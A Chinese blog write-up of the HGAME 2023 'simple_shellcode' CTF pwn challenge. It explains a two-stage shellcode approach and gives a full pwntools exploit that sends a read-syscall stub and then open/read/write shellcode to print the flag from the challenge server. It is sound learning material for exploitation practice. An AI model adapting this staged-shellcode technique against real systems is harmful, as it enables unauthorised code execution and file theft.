[HGAME 2023 week1]simple_shellcode

已于 2024-05-11 11:32:43 修改
阅读量283 收藏
点赞数 9
文章标签: 安全 网络安全
于 2024-05-11 11:18:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baishangzi/article/details/138707316
版权

今天看群里面再讨论这道题,之前做了没有写wp

主函数

orw

汇编

shellcode这种题都是执行地址或者shellcode做文章

这里不是shellcode本身,就是执行地址的问题

最后进行了一次call rdx

#rdx是开辟的地址,将shellcode注入再这里执行

由于只能读取0x10的大小,需要转移

可以read到rdx地址里面一个syscall_read

call的时候就再call会一次read函数

shellcode1=asm("xor rdi,rdi;mov rsi,0xcafe000f;syscall")

exp

from pwn import *
context.arch="amd64"
context.log_level="debug"
p=remote('node5.anna.nssctf.cn',28632)
#p=process("./vuln")

mmap_addr =0xcafe0000

p.recvuntil("shellcode:\n")
 
shellcode=shellcraft.open("./flag")
shellcode+=shellcraft.read(3,mmap_addr,0x50)
shellcode+=shellcraft.write(1,mmap_addr,0x50)
shellcode=asm(shellcode)

shellcode1=asm("xor rdi,rdi;mov rsi,0xcafe000f;syscall")
p.send(shellcode1)
'''
我直接就能通,群里的是用nop滑到shellcode的后面注入
'''
#p.sendline(b"\x90"*len(shellcode1)+shellcode)
p.send(shellcode)
p.interactive()

baishangzi
关注
  • 9
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
HGAME cdcollector-开源
04-24
【标题】"HGAME cdcollector-开源"是一个针对游戏收藏管理者的开源项目,它扩展了原有的cdcollector系统,特别设计用于管理和记录大量的电子游戏数据,尤其是HGAME(可能指的是成人向游戏)的数据库。这个系统利用...
【PWN · ORW | shellcode】[HGAME 2023 week1]simple_shellcode
Mr_Fmnwon的博客
01-04 648
注意,对于第一次输入的限制,这里刻意的打印了两种shellcode的长度。
【pwn】[HGAME 2023 week1]simple_shellcode --orw利用攻击
question55的博客
11-11 162
先查看程序的保护状态可以看到,保护全开,拖进ida看主函数的逻辑可以看到有个mmap函数:mmap() 函数是Unix和类Unix操作系统中的一个系统调用,用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中,从而避免了频繁的文件 I/O 操作,提高了文件的读取效率。mmap() 函数的一般形式如下:c复制代码void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);参数说
hgame2023 week1 writeup
01-15 4149
hgame2023 WEEK1
[HGAME 2023 week1] PWN 复现
Xzzzz911的博客
09-04 1007
先ida一下,可以看出来需要进行栈迁移,并且还存在沙盒,还有一段0x30的空间(溢出的空间较大),这就是为什么exp和[NSSCTF Round#14 Basic] rbp 不一样的原因,可溢出的空间不同,导致所利用的条件不同。首先ida一下,可以很明显的了解到跟沙盒有关,再查一下沙盒机制,显然不能直接构造orw,再加上read所存储的字节数少,不能直接构造,所以可以在mmap上面来构造orw。先泄露libc,再把orw写在自己确定的bss段,再用 leave ret 转到bss段,执行orw。
hgame2024-week1
247533的博客
02-13 814
今年的题目质量很高
某不知名ctfer选手的第三周周报
2303_79366759的博客
05-22 1192
之前忘记和大家说了,就是在第二周周报的时候写了一个神秘的一题目,heap_uaf1和heap_uaf2忘记和你们说libc的版本和攻击原理了,其实这点在打堆题目的时候是很重要,之前我周报写的那个神秘的一题目就是打的glibc2.27的Tcache,那么现在我们来打一下fastbin这种题和Tcache的区别就是能改的少很多,和多了一个对size的检查机制。然后其他的利用手段都是和Tcache是差不多的,OK,下次给你们讲offbyone和offbynull。
hgame:Haskell 游戏引擎
05-30
1. **Haskell语言基础**:Haskell是一种静态类型的、纯函数式的编程语言,它的核心理念是避免副作用,强调计算的数学性质。开发者需要理解函数的柯里化、类型推导、模式匹配、monads等概念,这些都是编写Hgame引擎的...
0hgame:用0h制作的游戏->阅读README
05-01
(对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club (?)2- DO NOT TOUCH BLACK THINGS IF YOU DONT WANT TO START AGAIN3- Try to reach the other side of the window to became the king ...
单表替换密码算法破解工具
01-15
网络密码中介绍的基本加密方法,与凯撒密码相似,该软件提供基本的替换功能
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1098
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
TSINGSEE青犀视频官方技术博客
07-12 585
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
中小学校园EasyCVR视频综合监管方案:构建安全、智能的校园环境
TSINGSEE青犀视频官方技术博客
07-10 1105
针对校园食堂后厨、仓库、配菜、清洗等监控区域的环境卫生与安全等进行全面的监管,及时发现违规异常情况,并能向监管人员及时发送告警信息,保障在校师生的食品与饮食安全。
智能车存在网络安全隐患,如何应设计出更好的安全防护技术?
最新发布
tigerman20201的博客
07-13 169
然而,高度的网络化和智能化也使智能车面临着严峻的网络安全挑战,如远程攻击、数据泄露和恶意控制等。未来,随着技术的不断发展,应持续加强对智能车网络安全的研究和创新,以应对不断变化的安全威胁。摘要:随着智能车技术的迅速发展,车辆的网络连接性不断增强,然而这也带来了诸多网络安全隐患。本文深入探讨了智能车面临的网络安全威胁,并提出了一系列创新的安全防护技术设计,旨在为智能车的安全运行提供更可靠的保障。黑客可以通过公共网络对智能车的通信系统进行攻击,干扰车辆的正常运行,甚至获取车辆的控制权。
[图解]SysML和EA建模住宅安全系统-14-黑盒系统规约
rolt的专栏
07-10 796
系统的外部可观察行为和物理特征
Foxit Reader:高效、安全、多功能的PDF阅读器技术解析
运维人生
07-10 455
由福建福昕软件开发股份有限公司开发,是一款轻量级、高效且功能丰富的PDF阅读器。它不仅拥有比同类产品更小的安装包体积和更快的打开速度,还全面支持最新的PDF文档属性,并提供了丰富的插件和自定义选项,极大地提升了用户体验。
等保测评新趋势:应对数字化转型中的安全挑战
A526847的博客
07-09 625
通过建立健全等保测评体系、加强技术研究和培训、构建安全生态系统、强化合规性管理以及加强数据安全和隐私保护等措施,企业可以更有效地应对数字化转型中的安全挑战,确保信息系统的安全性和合规性,为企业的业务创新和发展提供坚实的保障。针对数字化转型的特点,制定专门的等保测评标准和流程,加强对数据生命周期管理、数据脱敏、隐私保护等方面的要求。引入先进的安全技术和工具,提升等保测评的自动化和智能化水平。大数据、人工智能、机器学习等技术的引入,将极大地提升等保测评的自动化和智能化水平。一、等保测评的新趋势。
hgamewriteup
03-01
hgamewriteup

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值